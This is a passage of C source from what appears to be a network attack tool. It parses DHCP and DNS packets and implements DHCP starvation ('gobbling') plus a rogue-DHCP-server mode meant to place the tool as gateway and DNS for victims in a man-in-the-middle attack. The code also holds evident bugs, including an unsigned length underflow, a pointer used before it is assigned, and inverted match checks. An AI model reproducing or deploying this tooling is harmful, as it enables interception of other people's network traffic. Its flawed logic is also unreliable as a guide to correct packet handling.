					else if((dhcp->buf[t+loop+2]) == 13){
						if(v>1)printf("bootfile_size ");
					}

					else if((dhcp->buf[t+loop+2]) == 14){
						if(v>1)printf("merit_dump_file ");
					}

					else if((dhcp->buf[t+loop+2]) == 15){
						if(v>1)printf("domain_name ");
					}

					else if((dhcp->buf[t+loop+2]) == 16){
						if(v>1)printf("swap_server ");
					}

					else if((dhcp->buf[t+loop+2]) == 17){
						if(v>1)printf("root_path ");
					}

					else if((dhcp->buf[t+loop+2]) == 18){
						if(v>1)printf("extensions_path ");
					}

					else if((dhcp->buf[t+loop+2]) == 19){
						if(v>1)printf("ip_forwarding ");
					}

					else if((dhcp->buf[t+loop+2]) == 20){
						if(v>1)printf("non_local_source_routing ");
					}
					
					else if((dhcp->buf[t+loop+2]) == 28){
						if(v>1)printf("bcast_addr ");
					}

					else if((dhcp->buf[t+loop+2]) == 43){
						if(v>1)printf("vendor_specific ");
					}

					else if((dhcp->buf[t+loop+2]) == 50){
						if(v>1)printf("request_ip_address ");
					}

					else if((dhcp->buf[t+loop+2]) == 51){
						if(v>1)printf("ip_address_lease_time ");
					}

					else if((dhcp->buf[t+loop+2]) == 52){
						if(v>1)printf("options_overload ");
					}

					else if((dhcp->buf[t+loop+2]) == 53){
						if(v>1)printf("message_type ");
					}

					else if((dhcp->buf[t+loop+2]) == 54){
						if(v>1)printf("server_ip ");
					}

					else if((dhcp->buf[t+loop+2]) == 55){
						if(v>1)printf("request_list ");
					}

					else if((dhcp->buf[t+loop+2]) == 56){
						if(v>1)printf("message ");
					}

					else if((dhcp->buf[t+loop+2]) == 57){
						if(v>1)printf("max_dhcp_message_size ");
					}

					else if((dhcp->buf[t+loop+2]) == 58){
						if(v>1)printf("renewal_time ");
					}
					
					else if((dhcp->buf[t+loop+2]) == 59){
						if(v>1)printf("rebind_time ");
					}
					
					else if((dhcp->buf[t+loop+2]) == 60){
						if(v>1)printf("vendor_class_id ");
					}
		
					else if((dhcp->buf[t+loop+2]) == 61){
						if(v>1)printf("client_id ");
					}
				
									
					else {
						if(v>1)printf("unknown 0x%x ",(u_int8_t)dhcp->buf[t+loop+2]);
					}
					
				}
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else {
					if(v>2)printf("Opps: possible end of list missing (rest of packet may be jibberish), ");
				}
				break;

       			 case 56: // message
				len = (u_int8_t)dhcp->buf[t+1];
				if(len < 1){
					if(v)printf("Opps: invalid message length %x... returning\n\n", len);
					return(-1);
				}
			
				if(v>1){
					printf("message: ");
					for(loop = 0; loop <len; loop++){
						printf("%c", (u_char)dhcp->buf[t+loop+2]);
					}
				}
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++;
				}
				else {
					if(v>2)printf("Opps: possible end of list missing (rest of packet may be jibberish), ");
				}
				break;
	
			 case 57: //MAX DCHP message size
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 2){
					if(v)printf("Opps: invalid max dhcp message size length %x... returning\n\n", len);
					return(-1);
				}

				if(v>1)printf("Max DHCP message size: %d\n", convert16(pbuf, (t+2), (t+3)));
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;

			 case 58: //renewal (T1) time value
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 4){
					if(v)printf("Opps: invalid renewal time length %x... returning\n\n", len);
					return(-1);
				}
				if(v>1)printf("Renewal (T1) time: ");
				//renewala = convert8(heada->buf, (t+2));
                                //renewalb = convert8(heada->buf, (t+3));
				//renewalc = convert8(heada->buf, (t+4));
				//renewald = convert8(heada->buf, (t+5));
				if(len == 4){
					if(v>1)printf("%u secs", (u_int32_t)convert32(pbuf, (t+2), (t+3), (t+4), (t+5)));
				}
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
			 
			 case 59: //Rebinding (T2) time value
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 4){
					if(v)printf("Opps: invalid renewal time length %x... returning\n\n", len);
					return(-1);
				}
				if(v>1)printf("Renewal (T1) time: ");
			        //rebinda = convert8(heada->buf, (t+2));
				//rebindb = convert8(heada->buf, (t+3));
				//rebindc = convert8(heada->buf, (t+4));
				//rebindd = convert8(heada->buf, (t+5));
				if(v>1)printf("Rebinding (T2) time: ");
				if(len == 4){
					if(v>1)printf("%d secs", convert32(pbuf, (t+2), (t+3), (t+4), (t+5)));
				}
			
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
			
			 case 60: //vendor class ID
				len = (u_int8_t)dhcp->buf[t+1];
				if(len < 1){
					if(v)printf("Opps: invalid vendor class ident length %x... returning\n\n", len);
					return(-1);
				}
			
				if(v>1)printf("vendor Class Ident: ");
				for(loop = 0; loop <len; loop++){
					if(v>1)printf("0%.2x ",(u_int8_t)dhcp->buf[t+loop+2]);
				}
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
			
			 case 61: //client identfier
				len = (u_int8_t)dhcp->buf[t+1];
				if(len < 2){
					if(v)printf("Opps: invalid cli ident length %x... returning", len);
					return(-1);
				}
				if(v>1)printf("Client Identifier: ");
				for(loop = 0; loop <len; loop++){
					if(v>1)printf("0x%.2x ",(u_int8_t)dhcp->buf[t+loop+2]);
				}
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
	
			 default:
				if((dhcp->buf[t]) == 0) {
					if(v>1)printf("pad ");
					padcount++;
					t++;
					break;
				}
				else{
					len = (u_int8_t)dhcp->buf[t+1];
					if(v>1)printf("Unknown option 0x%.2x len: %.2x data: ", len, dhcp->buf[t]);
					for(loop = 0; loop < len; loop++){
						//if(v>1)printf("%x ",dhcp->buf[t+loop+2]);
					}
					if(v>1)printf(", ");
					t = t+len+2;
					if(dhcp->buf[t] == -1){
						t++; //end of random list
					}
					break;
				}
		} //end of switch
		
		if(padcount > 5) {
			//save's dumping lots of pads
			if(v>1)printf("padding......");
			break;
		}
	}//end of while
	if(v>1)printf("\n");
	if(dhcpdiscoverstarted && (type == DHCPOFFER)){
		yaddr = (unsigned char *)&(dhcp->yaddr);
		if(dhcpreplyinfo){
			if(!noprintinfo)printf("DHCP server at %d.%d.%d.%d %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n", (u_int8_t)srcip[0], (u_int8_t)srcip[1], (u_int8_t)srcip[2], (u_int8_t)srcip[3], (u_int)macsrc[0], (u_int)macsrc[1], (u_int)macsrc[2], (u_int)macsrc[3],(u_int)macsrc[4], (u_int)macsrc[5]);
			if(!noprintinfo)printf("offering %d.%d.%d.%d subnet %d.%d.%d.%d gateway %d.%d.%d.%d dns %d.%d.%d.%d\n",  yaddr[0], yaddr[1], yaddr[2], yaddr[3], subneta, subnetb, subnetc, subnetd, gatewaya, gatewayb, gatewayc, gatewayd, dnsa, dnsb, dnsc, dnsd);
		}
		dhcpdetected++;
		return(type);
	}
	return(type);
}



int handle_DHCPdiscover(void)
{
	void startmitmoffer(void);
	if(mitmgivingout){
		printf("Giving out IP address\n");
		startmitmoffer();
		//mitmgivingout = 0;
	}

	else return(0);
	return(0);
}


int handle_DHCPoffer(void)
{
	int startDHCPrequest(u_int32_t);
	struct my_dhcp *dhcp;
	Packet *tsd;
	mtnode mt;
	int loop;
	u_int8_t len;
	u_int length = 0, t;
	PMT p_curr, p_top;
	int flag = 0;

	p_top = p_curr = mtpoint;
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	dhcp = (struct my_dhcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));
	if(length < sizeof(struct my_dhcp)){
		printf("Opps: Truncated DHCP packet length: %d\n",length);
		drop++;
		return(-1); //255 but who cares were only returning the dhcp packet type
	}


	if(dhcpgobbling){
		
		mt.transid = ntohl(dhcp->trans_id);
		mt.ipaddress = dhcp->yaddr;
		mt.dhcptype = OFFERREC;

		len = 0;
		t = 0;
		
		while(t < length){
			len = 0;
			if(flag == 2) break; //exit loop
			switch(dhcp->buf[t]){
				case 1: len = (u_int8_t)dhcp->buf[t+1];
					if(len != 4){
						if(v)printf("Opps: subnet len != 4... len = %d returning\n", len);
						return(0);
					}
					for(loop = 0; loop<4; loop++){
						mt.subnetmask[loop] = (u_char)dhcp->buf[t+loop+2];
					}
					t = t+len+2;
					if(dhcp->buf[t] == -1){
						t++;
					}
					flag++;
					if(flag == 2){
						if(v)printf("found both case 1\n"); //exit loop
					}
					break;

				
				case 54:
					len = (u_int8_t)dhcp->buf[t+1];
					if(len != 4){
						if(v)printf("Opps: serverip len != 4... len = %d returning\n", len);
						return(0);
					}
					//printf("Server IP: ");
					for(loop = 0; loop <4; loop++){
						//printf("%x ",(u_int8_t)dhcp->buf[t+loop+2]);
						mt.serverip[loop] = (u_char)dhcp->buf[t+loop+2];
					}
					t = t+len+2;
					if(dhcp->buf[t] == -1){
						t++;
					}
					flag++;
					if(flag == 2){
						if(v)printf("found both case 54\n"); //exit loop
					}
					break;

				default: 
					//finding server ip option; 
					len = (u_int8_t)dhcp->buf[t+1];
					t = t+len+2;
					if(dhcp->buf[t] == -1){
						t++;
					}
					break;
			}
		}

		if(flag != 2) return(-1);
		
		if(p_curr == NULL){
			if(v)printf("ll is empty offer discarded\n");
			return(0);
		}

		while((p_curr != NULL) && (p_curr->transid != mt.transid)){
			//printf("no match in loop\n");
			p_curr = (PMT) p_curr->nextmt;
		}
		
		if(p_curr == NULL){
			if(v)printf("no match found offer discarded\n");
			return(0);
		}
		else{
			//printf("transid for sniffer offer found in ll\n");
			updatell(mt);
			if(startDHCPrequest(mt.transid) != 0){
				printf("Opps: startDHCPrequest error\n");
			}
			return(0);
		}	
	}
	return(0);
}

int handle_DHCPrequest(void)
{
	struct my_ip *ip;
	struct my_dhcp *dhcp;
	void startmitmack(void);
	extern u_int32_t convert32(char *, int, int, int, int);
	Packet *tsd;
	PMT p_curr;
	int i;
	u_int length = 0;
	u_int8_t len,t;
	int loop;
	u_char serverip[4];
	int flag;
	u_char requestip[4];
	u_char *offeredip;
	u_char *dhcpip;
	u_char *tid; //recieved transaction id
	u_char *toid; //offered transaction id
	i = 0;
	t = 0;
	len = 0;
	loop = 0;
	flag = 0;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}
	//tsd->caplen = length;
	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	dhcp = (struct my_dhcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));
	if(length < sizeof(struct my_dhcp)){
		printf("Opps: Truncated DHCP packet length: %d\n",length);
		drop++;
		return(-1); //255 but who cares were only returning the dhcp packet type
	}

	if(mitmgivingout){
		printf("giving out ip\n");
		//compare transactions + server Ip
		while(t < length){
			len = 0;
			if(flag == 2) break;
			switch(dhcp->buf[t]){
				//3?
				case 50:len = (u_int8_t)dhcp->buf[t+1];
					if(len !=4){
						printf("Opps: request IP invalid len %d returning\n", len);
						return(0);
					}
					for(loop = 0; loop <4; loop++){
						requestip[loop] = (u_char)dhcp->buf[t+loop+2];
					}
					t = t+len+2;
					if(dhcp->buf[t] == -1){
						t++;
					}
					flag++;
					if(flag == 2){
						printf("found both case 50\n");
					}
					break;
				
				case 54:
					len = (u_int8_t)dhcp->buf[t+1];
					if(len != 4){
						printf("Opps: serverip len !=4... len = %d returning\n", len);
						return(0);
					}
					//printf("Server IP: ");
					for(loop = 0; loop<4; loop++){
						//printf("%d ",(u_int8_t)dhcp->buf[t+loop+2]);
						serverip[loop] = (u_char)dhcp->buf[t+loop+2];
					}
					t = t+len+2;
					if(dhcp->buf[t] == -1){
						t++;
					}
					flag++;
					if(flag == 2){
						printf("found both case 54\n");
					}
					break;

				default: 
					//finding server ip option; 
					if(flag == 2){
						printf("found both case default\n");
						break;
					}
					//printf("looking for opts, t =%d, length  %d \n",t, length);
					len = (u_int8_t)dhcp->buf[t+1];
					t = t+len+2;
					if(dhcp->buf[t] == -1){
						t++;
					}
					if(t>=length){
						printf("not found\n");
						return(-1);
					} 
					break;
			}
		}
		if(flag != 2) return(-1);
		
		//printf("requested server ip %d.%d.%d.%d\n", serverip[0], serverip[1], serverip[2], serverip[3]);
		
		//find which ip was used as rogue dhcp server
		p_curr = mtpoint;
		if(p_curr == NULL){
			printf("opps: ll is empty\n");
			exit(1);
		}

		while((p_curr != NULL) && p_curr->type != DHCPSERVER){
			p_curr = (PMT) p_curr->nextmt;
		}

		if(p_curr == NULL){
			printf("Opps: can;t find dhcpserver in ll\n");
			exit(1);
		}
		
		dhcpip = (u_char *)&p_curr->ipaddress;
		
		//loop through list of ip's under our control until we find the one we sent out to client 
		p_curr = mtpoint;
		if(p_curr == NULL){
			printf("opps: ll is empty\n");
			exit(1);
		}

		while((p_curr != NULL) && p_curr->type != TARGET){
			p_curr = (PMT) p_curr->nextmt;
		}

		if(p_curr == NULL){
			printf("Opps: can;t find dhcpserver in ll\n");
			exit(1);
		}
		
		offeredip = (u_char *)&p_curr->ipaddress;

		
		tid = (u_char*)&dhcp->trans_id;
		//printf("requested transid %.2x %.2x %.2x %.2x\n",tid[0], tid[1], tid[2], tid[3]);
		
		toid = (u_char*)&tracktran;
		//printf("offered transid %.2x %.2x %.2x %.2x\n",toid[0], toid[1], toid[2], toid[3]);
	
		
		printf("dhcp server ip %d.%d.%d.%d requested server ip %d.%d.%d.%d\ntransid 0x%x request transid 0x%x\noffered ip %d.%d.%d.%d requested ip %d.%d.%d.%d\n", dhcpip[0], dhcpip[1], dhcpip[2], dhcpip[3], serverip[0], serverip[1], serverip[2], serverip[3], convert32( toid,0,1,2,3), convert32(tid, 0,1,2,3), offeredip[0], offeredip[1], offeredip[2],offeredip[3], requestip[0], requestip[1], requestip[2], requestip[3]);
		
		
		if((tid[0] != toid[0]) && (tid[1] != toid[1]) && (tid[2] != toid[2]) && (tid[3] != toid[3])){
			printf("Opps: transactions don't match\n");
			return(0);
		}

		if((dhcpip[0] != serverip[0]) && (dhcpip[1] != serverip[1]) && (dhcpip[2] != serverip[2]) && (dhcpip[3] != serverip[3])){
			printf("Opps: requested dhcp server not under our control\n");
			return(0);
		}
		
		
		if((offeredip[0] != requestip[0]) && (offeredip[1] != requestip[1]) && (offeredip[2] != requestip[2]) && (offeredip[3] != requestip[3])){
			printf("Opps: offered IP doesn;t match requested ip\n");
			return(0);
		}
		
		printf("Looking good.... sending DHCP ACK to confirm IP address binding\n");
		startmitmack();
	}
	return(0);
}

int handle_DHCPdecline(void)
{
	printf("DHCP decline\n");
	return(0);
}

int handle_DHCPack(void)
{
	struct my_dhcp *dhcp;
	Packet *tsd;
	PMT p_curr, p_top;
	mtnode mt;
	
	p_top = p_curr = mtpoint;

 	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}
 
	dhcp = (struct my_dhcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));

	mt.transid = ntohl(dhcp->trans_id);
	mt.dhcptype = ACKREC;
	mt.gobbled = 1;
	if(dhcpgobbling){
		
		if(p_curr == NULL){
			return(0);
		}

		while((p_curr != NULL) && (p_curr->transid != mt.transid)){
			//printf("no match in loop\n");
			p_curr = (PMT) p_curr->nextmt;
		}
		
		if(p_curr == NULL){
			//printf("no match found ack discarded\n");
			return(0);
		}
		else{
			//printf("transid for sniffed offer found in ll\n");
			if(pthread_mutex_lock(&typelock) != 0){
					printf("Opps: pthread_mutex_lock typelock\n\n");
					exit(1);
				}

			if(mitmgobble){
				if(!mitmlasttype){
					if(mitmother){
						mt.type = NAT;
						mitmlasttype = NAT;
					}
					else if(mitmdns){
						mt.type = DHCPSERVER;
						mitmlasttype = DHCPSERVER;
					}
					else if(mitmsubnet){
						mt.type = DHCPSERVER;
						mitmlasttype = DHCPSERVER;
					}
					else {
						printf("Opps: mitm type not found\n\n");
						exit(1);
					}
				}
				else {
					if(mitmlasttype == DHCPSERVER){
						mt.type = DNS;
						mitmlasttype = DNS;
					}
					else if(mitmlasttype == DNS){
						mt.type = TARGET;
						mitmlasttype = TARGET;
					}
					else if(mitmlasttype == TARGET){
						mt.type = GATEWAY;
						mitmlasttype = GATEWAY;
					}
					else {
						if(v)printf("Opps: possible mitmlasttype error %d\n\n", mitmlasttype);
						mt.type = mitmlasttype;
					}
				}		
			}
			else mt.type = NOTSET;
			mt.ping = 1;
			updatell(mt);
			if(pthread_mutex_unlock(&typelock) != 0){
				printf("Opps: pthread_mutex_unlock typelock\n\n");
				exit(1);
			}
		}
		return(0);
	}
	return(0); //shouldn;t reach here
}

int handle_DHCPnack(void)
{
	struct my_dhcp *dhcp;
	struct my_ip *ip;
	Packet *tsd;
	
	ip = (struct my_ip *)(tsd->pkt + sizeof(struct ether_header));
	dhcp = (struct my_dhcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	printf("Opps: DHCP nack.... Still need to handle nack's.... strange things may go on!!!! ctrl+c? \n");
	return(0);
}

int handle_DHCPrelease(void)
{
	if(v>1)printf("DHCP release\n");
	return(0);
}

int handle_DHCPinform(void)
{
	if(v>1)printf("DHCP inform\n");
	return(0);
}
int handle_udpDNS(void)
{
	unsigned int convert32(char *ptr, int anum, int bnum, int cnum, int dnum);
	extern u_int16_t convert16(char *, int, int);
	//void decodednsdata(char *, int, int);
	struct my_dnsquery *dns;
	struct my_ip *ip;
	struct my_udp *udp;
	u_char *srcip, *dstip;
	Packet *tsd;
	u_int length = 0;
	int response = 0;
	int query = 0;
	u_int8_t len = 0;
	int opcodes = 0;
	int i = 0;
	int t = 0;
	//int c = 0;
	u_int qcount = 0, c = 0;
	//int d = 0;
	//int e = 0;
	//int f = 0;
	int g = 0;
	//int pos = 0;
	//int dsize = 0;
	//int lenn = 0;
	//int pointer;
	//u_int32_t ttime = 0;
	//char *pbuf = dns->buf;
	length = 0;
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	udp = (struct my_udp*)(tsd->pkt +sizeof(struct ether_header) + sizeof(struct my_ip));
	dns = (struct my_dnsquery*)(tsd->pkt +sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));

	srcip = (u_char *)&(ip->ip_src);
	dstip = (u_char *)&(ip->ip_dst);
	
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));

	if(length < sizeof(struct my_dnsquery)){
		printf("Opps: Truncated dns packet length: %d\n",length);
		drop++;
		return(-1); //255 but who cares were only returning the dhcp packet type
	}
	
	if(v)printf("%d.%d.%d.%d -> %d.%d.%d.%d DNS: id 0x%.2x, flagsa 0x%.2x, flagsb 0X%.2x, nq %d, nans %d, nauth %d, nadd %d\n", srcip[0], srcip[1], srcip[2], srcip[3], dstip[0], dstip[1], dstip[2], dstip[3], ntohs(dns->dnsid), (u_int8_t)dns->flagsa, (u_int8_t)dns->flagsb, ntohs(dns->nq),ntohs(dns->nans), ntohs(dns->nauth), ntohs(dns->nadd));
	
	if(dns->flagsa & DNS_Q) {
		if(v)printf("DNS Response: ");
		response = 1;
		query = 0;
	}
	else {
		if(v)printf("DNS Query: ");
		query = 1;
		response = 0;
	}

	
	if((opcodes = (dns->flagsa & DNS_OPCODE) >> 3) != 0){
		if(v)printf("Opcodes = %d, ", opcodes);
		if (opcodes == 1){
			if(v)printf("Inverse query,  ");
		}
		if(opcodes == 2){
			if(v)printf("Server status report, ");
		}
	}
		
	else {
		if(v) printf("Standard (no opcodes), ");
	}
	
	
	if(dns->flagsa & DNS_AA) {
		if(v)printf("auth answe, ");
	}
	else {
		if(v)printf("not auth answer, ");
	}

	
	if(dns->flagsa & DNS_TC) {
		if(v)printf("truncated message, ");
	}
	else{
		if(v)printf("not truncated message, ");
	}
	
	if(dns->flagsa & DNS_RD) {
		if(v)printf("recursion request, ");
	}
	else{
		if(v)printf("no recursion request, ");
	}
	
	
	if(dns->flagsb & DNS_RA) {
		if(v)printf("recursion available, ");
	}
	else {
		if(v)printf("recusion unavailable, ");
	}

	
	if(dns->flagsb & DNS_AD) {
		if(v)printf("auth data from named, ");
	}
	else {
		if(v)printf("not auth data from named, ");
	}
	
	
	if(dns->flagsb & DNS_CD) {
		if(v)printf("checking disabled, ");
	}
	else {
		if(v)printf("checking not disabled, ");
	}
	
	
	if(dns->flagsb & DNS_RCODE){
		if(v)printf("response code 0x%x\n", (u_int16_t)(dns->flagsb & DNS_RCODE) >> 1);
	}
	else {
		if(v)printf("No error in response code\n");
	}
	
	//TODO return then do stuff based on flags
	
	//decode question
	t = 0;
	g = 0;
	qcount = ntohs(dns->nq);
	if(qcount > 1){
		if(v)printf("DNS query asking more than 1 question..... returning\n");
		return(0);
	}
	//printf("c %d, nq %d\n",c, ntohs(dns->nq));
	//return(0);
	while(c != qcount){ 
		//printf("c %d, nq %d\n",c, ntohs(dns->nq));
		len = dns->buf[t];
		t++; //move from size to 1st element of domain name
		if(response){
			if(v)printf("DNS response: ");
		}
		if(query){
			if(v)printf("DNS Query: ");
		}
		if(v)printf("Question ");
		//decodednsdata(pbuf, DNSQ, len);
		while(len != 0x00){
			//printf("len 0x%x\n", len);
			for(i=0; i<len; i++){
			//printf("buf element: %d, char in hex: 0x%x, char: %c\n",t ,(u_char)dns->buf[t+0], (u_char)dns->buf[t+0]);
				if(v)printf("%c",(u_char)dns->buf[t]);
				t++;
			}
			len = dns->buf[t];
			if(v)printf(".");
			t++; //jump past size
		}

		if((dns->buf[t]) != 0x00){
			if(v)printf("typeb1 = 0x%.2x\n", dns->buf[t]);
		}
		t++;
		
		if(dns->buf[t] & 0x01){
			if(v)printf(", Type: Host address");
		}
		else if(dns->buf[t] & 0x0c){
			if(v)printf(", Type: Domain name pointer");
		}
		else {
			if(v)printf("type = 0x%.2x\n", dns->buf[t]);
		}
			
		t++;
		
		if((dns->buf[t]) != 0x00){
			if(v)printf("class = 0x%.2x\n", dns->buf[t]);
		}
		t++;
		
		if(dns->buf[t] & 0x01){
			if(v)printf(", Class: Inet");
		}
		else{
			if(v)printf("class = 0x%.2x\n", dns->buf[t]);
		}
		t++;
	
		if(v)printf("\n");
		c++;
	}
	return(0);
	/*
	while(d != (ntohs(dns->nans))){
		
		len = (u_int8_t) dns->buf[t];
		printf("answer: ");
		while(len != 0x00){
			switch(len){
				case 0xc0: 
					//printf("len = 0x%x\n", (u_int8_t)len);
					//printf("t = %d", t);
					printf("pointer to 0x%.2x\n", (dns->buf[t+1] & 0x00ff));
					//t++;
				
					len = dns->buf[((dns->buf[t+1] & 0x00ff) - 0x0c)];
					g = ((dns->buf[t+1] & 0x00ff) - 0x0c)+1; 
					
					for(i=0;i<len;i++){
						printf("%c",(u_char)dns->buf[g]);
						g++;
					}
					printf(".");
					printf("\n");
					len = dns->buf[g];
					printf("new len 0x%x\n", len);
					switch(len){
						case 0xc0:
							printf("pointer within 1st part of decode\n");
							pointer = 1;
							break;
						case 0x00:
							printf("End of pointer list\n");
							len = 0x00;
							break;
						default:
							g++; //step to 1st arg
							for(i=0;i<len;i++){
								printf("%c",(u_char)dns->buf[g]);
								g++;
							}
							printf("\n");
							lenn = dns->buf[g];
							printf("len after curr char %d\n",lenn);
							switch(lenn){
								case 0xc0:
									printf("pointer within 2nd after partial decode\n");
									break;

								case 0x00:
									printf("End of pointer list\n");
									len = 0x00;
									break;
								
								default:
									g++;
									for(i=0;i<lenn;i++){
										printf("%c",(u_char)dns->buf[g]);
										g++;
									}
									printf("\n");
									lenn = dns->buf[g];
									printf("len after 2nd part decode %d\n", lenn);
									break;
							}
								
									
							len = dns->buf[g];
							break;
					
					}	
					t++;
					t++;
					len = dns->buf[t];
					printf("end of 2nd switch pointer %d",len);
					break;
					
				case 0x00: printf("oops should of returned\n");
					   exit(1);
					break;
					
				default:
					printf("len = %d\n",len);
					for(i=0; i<len; i++){
						printf("%c",(u_char)dns->buf[t]);
						t++;
					}
					printf(".");
					len = (u_int8_t) dns->buf[t];
					printf("\nnew len = %d\n", len);
					t++;
					break;
			}
		}
			
		if((dns->buf[t]) != 0x00){
			printf("typeb1 = 0x%x\n", dns->buf[t]);
		}
		t++;
		
		if(dns->buf[t] & 0x01){
			printf("Type: Host address, ");
		}
		else if(dns->buf[t] & 0x0c){
			printf("Type: Domain name pointer, ");
		}
		else printf("typeb2 = 0x%x\n", dns->buf[t]);
		t++;
		
		if((dns->buf[t]) != 0x00){
			printf("classb1 = 0x%x\n", dns->buf[t]);
		}
		t++;
		
		if(dns->buf[t] & 0x01){
			printf("Class: Inet, ");
		}
		else printf("classb2 = 0x%x\n", dns->buf[t]);
		t++;
	
		printf("ttl %u\n", convert32(pbuf, t, t+1, t+2, t+3));
	
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
	
		//HERE SORTING OUT DNS PACKETS
		
		dsize = (dns->buf[t] + dns->buf[t+1]);
		printf("data size: %d, ",dsize);

		//printf("data size 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
		
		//printf("data size 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
		
		
		printf("data: ");
		for(i=0;i<dsize;i++){
			printf("%d(%c) ",(u_int8_t)dns->buf[t],(u_int8_t)dns->buf[t]);
			t++;
		}
		printf("\n");
		d++;
	}
	
	while(e != (ntohs(dns->nauth))){
	*//*	len = (u_int8_t) dns->buf[t];
		//t++;
		printf("auth: ");
		
		while(len != 0x00){
			//printf("len = 0x%x\n", (u_int8_t)len);
			
			if(len == 0xc0){
				//printf("t = %d", t);
				printf("pointer to 0x%x\n", (dns->buf[t+1] & 0x00ff));
				//t++;
				//len = dns->buf[((dns->buf[t+1] & 0x00ff) - 0x0c)];
				//g = ((dns->buf[t+1] & 0x00ff) - 0x0c)+1; 
			
				//printf("pointer len 0x%x\n",len);
				//printf("g= 0x%x %c\n", g, g);
				//while(len != 0x00){
				//	if(len == 0xc0){
				//		goto AUTHTOP; //printf("sort it\n");
						//len = dns->buf[((dns->buf[t+1] & 0x00ff) - 0x0c)];
						//g = ((dns->buf[t+1] & 0x00ff) - 0x0c)+1; 
						//exit(1);
				//	}
				//	for(i=0; i<len; i++){
				//		printf("%c",(u_char)dns->buf[g]);
				//		g++;
				//	}
				//	printf(".");
				//	len = (u_int8_t) dns->buf[g];
					//printf("new len = %d", len);
				//	g++;	
				//}
				//printf(" ");
				//exit(1);
			}
			else{
				for(i=0; i<len; i++){
					printf("%c",(u_char)dns->buf[t]);
					t++;
				}
			len = dns->buf[t];
			printf(".");
			t++; //jump past size
			printf(" ");
			}

		}	
		if((dns->buf[t]) != 0x00){
			printf("typeb1 = 0x%x\n", dns->buf[t]);
		}
		t++;
		
		if(dns->buf[t] & 0x01){
			printf("Type: Host address, ");
		}
		else if(dns->buf[t] & 0x0c){
			printf("Type: Domain name pointer, ");
		}
		else printf("typeb2 = 0x%x\n", dns->buf[t]);
		t++;
		
		if((dns->buf[t]) != 0x00){
			printf("classb1 = 0x%x\n", dns->buf[t]);
		}
		t++;
		
		if(dns->buf[t] & 0x01){
			printf("Class: Inet, ");
		}
		else printf("classb2 = 0x%x\n", dns->buf[t]);
		t++;
		printf("ttl %u\n", ntohl((u_int32_t)convert32(pbuf, t, t+1, t+2, t+3)));
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
	
		//HERE SORTING OUT DNS PACKETS
		
		dsize = (dns->buf[t] +	 dns->buf[t+1]);
		printf("data size: %d, ",dsize);

		//printf("data size 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
		
		//printf("data size 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
		
		
		printf("data: ");
		for(i=0;i<dsize;i++){
			printf("%d(%c) ",(u_int8_t)dns->buf[t],(u_int8_t)dns->buf[t]);
			t++;
		}
		printf("\n");
		e++;
	}
*/

/*	while(f != (ntohs(dns->nadd))){
		len = (u_int8_t) dns->buf[t];
		//t++;
		printf("additional: ");
		while(len != 0x00){
			//printf("len = 0x%x\n", (u_int8_t)len);
			if(len == 0xc0){
				//printf("t = %d", t);
				//printf("pointer to 0x%x\n", (dns->buf[t+1] & 0x00ff));
				//t++;
